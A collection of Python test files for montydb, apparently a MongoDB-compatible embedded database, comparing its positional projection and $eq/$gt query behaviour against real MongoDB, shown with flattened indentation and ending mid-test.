decimal128_NaN = None
decimal128_INF = None
decimal128_NaN_ls = None
BSONError = None
InvalidId = None
InvalidDocument = None
id_encode = None
document_encode = None
document_decode = None
json_loads = None
json_dumps = None
parse_codec_options = None
def init(use_bson=None):
from . import _bson
from .. import errors
self = sys.modules[__name__]
if self.bson_used is not None:
return
# Init
if use_bson is None:
try:
import bson
except ImportError:
use_bson = False
else:
use_bson = True
if use_bson:
bson_ = _bson.BSON_()
else:
bson_ = _bson.NoBSON()
self.bson_used = bson_.bson_used
for name in __all__:
setattr(self, name, getattr(bson_, name))
errors.init_bson_err()
__all__ = [
"SON",
"BSON",
"ObjectId",
"Timestamp",
"MinKey",
"MaxKey",
"Int64",
"Decimal128",
"Binary",
"Regex",
"Code",
"RawBSONDocument",
"CodecOptions",
"decimal128_NaN",
"decimal128_INF",
"decimal128_NaN_ls",
"BSONError",
"InvalidId",
"InvalidDocument",
"id_encode",
"document_encode",
"document_decode",
"json_loads",
"json_dumps",
"parse_codec_options",
]
```
#### File: test_engine/test_projection/test_projection_positional.py
```python
import pytest
from pymongo.errors import OperationFailure as mongo_op_fail
from montydb.errors import OperationFailure as monty_op_fail
def count_documents(cursor, spec=None):
return cursor.collection.count_documents(spec or {})
def test_projection_positional_1(monty_proj, mongo_proj):
docs = [
{"a": [{"b": 1}, {"b": 3}]}
]
spec = {"a.b": {"$gt": 2}}
proj = {"a.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_2(monty_proj, mongo_proj):
docs = [
{"a": 85, "b": [{"x": 1, "y": 5}, {"x": 5, "y": 12}]},
{"a": 60, "b": [{"x": 4, "y": 8}, {"x": 0, "y": 6}]},
{"a": 90, "b": [{"x": 2, "y": 12}, {"x": 3, "y": 7}]},
]
proj = {"b.$": 1}
def run(spec):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
spec = {"a": {"$gt": 80}, "b.x": {"$gt": 4}}
run(spec)
spec = {"b.x": {"$gt": 4}, "a": {"$gt": 80}}
run(spec)
def test_projection_positional_3(monty_proj, mongo_proj):
docs = [
{"a": [{"x": [1]}, {"x": [5]}]},
{"a": [{"x": [4]}, {"x": [0]}]},
{"a": [{"x": [2]}, {"x": [3]}]},
]
spec = {"a.x": {"$gt": 4}}
proj = {"a.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_4(monty_proj, mongo_proj):
docs = [
{"a": {"b": [1, 2, 3]}}
]
spec = {"a.b": 2}
proj = {"a.b.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_5(monty_proj, mongo_proj):
docs = [
{"a": {"b": [1, 2, 3], "c": [4, 5, 6]}},
{"a": {"b": [1, 2, 3], "c": [4]}},
]
spec = {"a.b": 2}
proj = {"a.c.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_projection_positional_6(monty_proj, mongo_proj):
docs = [
{"a": {"b": [{"c": [1]}, {"c": [2]}, {"c": [3]}]}},
]
spec = {"a.b.c": 2}
proj = {"a.b.c.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_7(monty_proj, mongo_proj):
docs = [
{"a": {"b": [{"c": [1, 5]}, {"c": 2}, {"c": [3]}]}},
]
spec = {"a.b.c": 2}
proj = {"a.b.c.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_8(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [1, 5]}, {"b": [2, 4]}, {"b": [3, 6]}]},
]
spec = {"a.b.1": {"$eq": 6}}
proj = {"a.b.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_9(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [1, 5]}, {"b": 2}, {"b": [3]}]},
]
spec = {"a.b.1": 5}
proj = {"a.b.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_10(monty_proj, mongo_proj):
docs = [
{"a": {"b": [{"c": 5}, {"c": 10}], "x": [{"c": 5}, {"c": 10}]}},
]
spec = {"a.x.c": 5}
proj = {"a.b.x.$": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_11(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]},
]
def run(spec, proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
spec = {"a.b.2": 4}
proj = {"a.b.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.$.b": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"$.a.b": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a": 1, "$.a.b": 1}
run(spec, proj)
for ie in range(2):
spec = {"a.b": 2}
proj = {"a": ie}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.0.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.0.1.$": 1}
run(spec, proj)
spec = {"a.b": 2}
proj = {"a.b.0.1.x.$": 1}
run(spec, proj)
for ie in range(2):
spec = {"a.b": 2}
proj = {"a.b.0.1.x": ie}
run(spec, proj)
for ie in range(2):
spec = {}
proj = {"a.0.b.x": ie}
run(spec, proj)
proj = {"a.b.1": ie}
run(spec, proj)
proj = {"a.b": ie}
run(spec, proj)
def test_projection_positional_12(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [{"c": 1}, {"x": 1}]}, {"b": [{"c": 1}, {"x": 1}]}]},
{"a": [{"b": [{"c": [0, 1]}, {"5": 8}, "hello", {"x": 1}, 8]},
{"b": [{"c": {"1": 8}}, "world", {"x": 1}, 0]}]}
]
spec = {}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
for ie in range(2):
proj = {"a.b.5": ie}
run(proj)
proj = {"a.b.c.1": ie}
run(proj)
proj = {"a.x": ie}
run(proj)
proj = {"a.0.b": ie}
run(proj)
proj = {"a.b.s": ie}
run(proj)
proj = {"a.b.c.": ie} # Redundant dot
run(proj)
proj = {"a.b.c": ie}
run(proj)
def test_projection_positional_13(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [1, 5]}, {"b": 2}, {"b": [3, 10, 4]}],
"c": [{"b": [1]}, {"b": 2}, {"b": [3, 5]}]},
]
spec = {"a.b.0": 3, "c.b.1": 5}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.$.b": 1}
run(proj)
def test_projection_positional_14(monty_proj, mongo_proj):
docs = [
{"a": 5, "b": {"c": 5, "g": 0}, "x": [1, 2]}
]
spec = {}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
for ie in range(2):
proj = {"a": ie, "x.1": ie, "b.g": ie}
run(proj)
def test_projection_positional_15(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, {"c": 5}]}, {"b": [3, 2, {"x": 5}]}]},
]
spec = {"a.b.1": 1}
proj = {"a.b.$": 1, "a.b.x": 1}
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_projection_positional_err_2(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}],
"b": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]}
]
spec = {"b.0.b": 2}
proj = {"a.b.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
    # ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_err_96_1(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]}
]
spec = {"a.0.b": 2}
proj = {"a.b.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_err_96_2(monty_proj, mongo_proj):
docs = [
{"a": [{"b": [0, 1, 2]}, {"b": [3, 2, 4]}]}
]
spec = {"a.0.b": 2}
proj = {"a.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_err_96_3(monty_proj, mongo_proj):
docs = [
{"a": [0, 1]}
]
spec = {"a.1": 1}
proj = {"a.$": 1}
with pytest.raises(mongo_op_fail) as mongo_err:
next(mongo_proj(docs, spec, proj))
with pytest.raises(monty_op_fail) as monty_err:
next(monty_proj(docs, spec, proj))
# ignore comparing error code
# assert mongo_err.value.code == monty_err.value.code
def test_projection_positional_16(monty_proj, mongo_proj):
docs = [
{"a": {"b": {"c": [1, 2, 3]}, "d": [1]}}
]
spec = {"a.b.c": 2}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.d.$": 1}
run(proj)
def test_projection_positional_17(monty_proj, mongo_proj):
docs = [
{"a": {"b": [0, 1]}},
]
spec = {"a.b.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.b.1": 1}
run(proj)
def test_projection_positional_18(monty_proj, mongo_proj):
docs = [
{"a": {"b": [[1], 1]}},
]
spec = {"a.b.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.$": 1}
run(proj)
proj = {"a.b.1": 1}
run(proj)
def test_projection_positional_19(monty_proj, mongo_proj):
docs = [
{"a": {"b": {"c": [0, 1]}}},
]
spec = {"a.b.c.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.b.c.$": 1}
run(proj)
proj = {"a.b.c.1": 1}
run(proj)
def test_projection_positional_20(monty_proj, mongo_proj):
docs = [
{"a": [{"1": 1}, 1]},
]
spec = {"a.1": 1}
def run(proj):
monty_c = monty_proj(docs, spec, proj)
mongo_c = mongo_proj(docs, spec, proj)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
proj = {"a.$": 1}
run(proj)
```
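The `monty_proj` / `mongo_proj` fixtures used above come from the suite's conftest and run each query against both montydb and a real MongoDB instance. As a rough standalone illustration of the positional `$` projection being exercised, a sketch like the following should work, assuming montydb is installed and its PyMongo-style `insert_one` / `find_one` methods behave as in these tests (the in-memory URI follows montydb's documented usage):
```python
from montydb import MontyClient

# In-memory montydb instance; no MongoDB server is required.
client = MontyClient(":memory:")
col = client.db.test

col.insert_one({"a": [{"b": 1}, {"b": 3}]})

# Positional projection: return only the first array element that matched
# the query predicate on "a.b".
doc = col.find_one({"a.b": {"$gt": 2}}, {"a.$": 1})
print(doc)  # expected to keep only the matching element {"b": 3}
```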
#### File: test_engine/test_queries/test_queryop_comparsion_eq.py
```python
from montydb.types import PY3, bson_ as bson
from ...conftest import skip_if_no_bson
def count_documents(cursor, spec=None):
return cursor.collection.count_documents(spec or {})
def test_qop_eq_1(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 0}
]
spec = {"a": 1}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_eq_2(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 0}
]
spec = {"a": {"$eq": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_eq_3(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": 1}
]
spec = {"a": {"$eq": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_eq_4(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": [[1], 2]}
]
spec = {"a": {"$eq": [1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_eq_5(monty_find, mongo_find):
docs = [
{"a": [2, 1]},
{"a": [1, 2]},
{"a": [[2, 1], 3]},
{"a": [[1, 2], 3]},
]
spec = {"a": {"$eq": [2, 1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_eq_6(monty_find, mongo_find):
docs = [
{"a": [{"b": bson.Binary(b"00")}]},
{"a": [{"b": bson.Binary(b"01")}]},
]
spec = {"a.b": {"$eq": b"01"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
count = 1 if PY3 else 0
assert count_documents(mongo_c, spec) == count
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
if PY3:
assert next(mongo_c) == next(monty_c)
mongo_c.rewind()
assert next(mongo_c)["_id"] == 1
@skip_if_no_bson
def test_qop_eq_7(monty_find, mongo_find):
docs = [
{"a": [{"b": bson.Code("a")}]},
]
spec = {"a.b": {"$eq": "a"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_8(monty_find, mongo_find):
docs = [
{"a": [{"b": "a"}]},
]
spec = {"a.b": {"$eq": bson.Code("a")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_9(monty_find, mongo_find):
docs = [
{"a": 1},
]
spec = {"a": {"$eq": bson.Int64(1)}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_10(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 1.0},
]
spec = {"a": {"$eq": bson.Decimal128("1")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
@skip_if_no_bson
def test_qop_eq_11(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": 1.0},
]
spec = {"a": {"$eq": bson.Decimal128("1.0")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_eq_12(monty_find, mongo_find):
docs = [
{"tags": [["ssl", "security"], "warning"]}
]
spec = {"tags.0": "security"}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
```
#### File: test_engine/test_queries/test_queryop_comparsion_gt.py
```python
import pytest
from montydb.errors import OperationFailure
from montydb.types import PY3, bson_ as bson
from datetime import datetime
from ...conftest import skip_if_no_bson
def count_documents(cursor, spec=None):
return cursor.collection.count_documents(spec or {})
def test_qop_gt_1(monty_find, mongo_find):
docs = [
{"a": 0},
{"a": 1}
]
spec = {"a": {"$gt": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_2(monty_find, mongo_find):
docs = [
{"a": "x"},
{"a": "y"}
]
spec = {"a": {"$gt": "x"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_3(monty_find, mongo_find):
docs = [
{"a": 10},
{"a": "10"}
]
spec = {"a": {"$gt": 10}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_4(monty_find, mongo_find):
docs = [
{"a": True},
{"a": False}
]
spec = {"a": {"$gt": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_5(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": False}
]
spec = {"a": {"$gt": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_6(monty_find, mongo_find):
docs = [
{"a": [1, 2]},
{"a": [3, 4]}
]
spec = {"a": {"$gt": [2, 3]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_7(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"b": 6}}
]
spec = {"a": {"$gt": {"b": 5}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_8(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"e": 4}}
]
spec = {"a": {"$gt": {"c": 4}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_9(monty_find, mongo_find):
oid_0 = bson.ObjectId(b"000000000000")
oid_1 = bson.ObjectId(b"000000000001")
docs = [
{"a": oid_0},
{"a": oid_1}
]
spec = {"a": {"$gt": oid_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_10(monty_find, mongo_find):
dt_0 = datetime(1900, 1, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": dt_0},
{"a": dt_1}
]
spec = {"a": {"$gt": dt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_11(monty_find, mongo_find):
ts_0 = bson.Timestamp(0, 1)
ts_1 = bson.Timestamp(1, 1)
docs = [
{"a": ts_0},
{"a": ts_1}
]
spec = {"a": {"$gt": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_12(monty_find, mongo_find):
min_k = bson.MinKey()
max_k = bson.MaxKey()
docs = [
{"a": min_k},
{"a": max_k}
]
spec = {"a": {"$gt": min_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_13(monty_find, mongo_find, mongo_version):
oid_0 = bson.ObjectId(b"000000000000")
max_k = bson.MaxKey()
min_k = bson.MinKey()
docs = [
{"a": oid_0},
{"a": max_k},
{"a": min_k},
{"a": 55},
]
spec = {"a": {"$gt": max_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
count = 3 if mongo_version[0] == 3 else 0
assert count_documents(mongo_c, spec) == count
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(count):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_14(monty_find, mongo_find):
ts_0 = bson.Timestamp(0, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": ts_0},
{"a": dt_1}
]
spec = {"a": {"$gt": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0 # They don't sort together
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_15(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": 2}
]
spec = {"a": {"$gt": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_16(monty_find, mongo_find):
docs = [
{"a": [2, 3]},
{"a": 2}
]
spec = {"a": {"$gt": 2}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_17(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gt": [1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
def test_qop_gt_18(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gt": [2]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 0
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
def test_qop_gt_19(monty_find, mongo_find):
docs = [
{"a": [None]},
{"a": 2}
]
spec = {"a": {"$gt": []}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_20(monty_find, mongo_find):
long_ = bson.Int64(10)
int_ = 10
float_ = 10.0
decimal_ = bson.Decimal128("10.0")
docs = [
{"a": long_},
{"a": int_},
{"a": float_},
{"a": decimal_}
]
spec = {"a": {"$gt": 9.5}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 4
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(4):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_21(monty_find, mongo_find):
docs = [
{"a": bson.Decimal128("1.1")},
{"a": bson.Decimal128("NaN")},
{"a": bson.Decimal128("-NaN")},
{"a": bson.Decimal128("sNaN")},
{"a": bson.Decimal128("-sNaN")},
{"a": bson.Decimal128("Infinity")}
]
spec = {"a": {"$gt": bson.Decimal128("0")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 2
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
for i in range(2):
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_22(monty_find, mongo_find):
bin_0 = bson.Binary(b"0")
bin_1 = bson.Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gt": bin_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
    assert count_documents(mongo_c, spec) == (2 if PY3 else 1)
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
if PY3:
for i in range(2):
assert next(mongo_c) == next(monty_c)
else:
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_23(monty_find, mongo_find):
bin_0 = bson.Binary(b"0")
bin_1 = bson.Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gt": byt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
    assert count_documents(mongo_c, spec) == (2 if PY3 else 1)
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
if PY3:
for i in range(2):
assert next(mongo_c) == next(monty_c)
else:
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_24(monty_find, mongo_find):
code_0 = bson.Code("0")
code_1 = bson.Code("1")
docs = [
{"a": code_0},
{"a": code_1}
]
spec = {"a": {"$gt": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_25(monty_find, mongo_find):
code_0 = bson.Code("0")
code_1 = bson.Code("1")
code_1s = bson.Code("1", {})
docs = [
{"a": code_1},
{"a": code_1s}
]
spec = {"a": {"$gt": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert count_documents(mongo_c, spec) == 1
assert count_documents(monty_c, spec) == count_documents(mongo_c, spec)
assert next(mongo_c) == next(monty_c)
@skip_if_no_bson
def test_qop_gt_26(monty_find, mongo_find):
code_0s = bson.Code("0", {})
code_1s = bson.Code("1", {})
docs = [
{"a": code_0s},
{"a": code_1s}
]
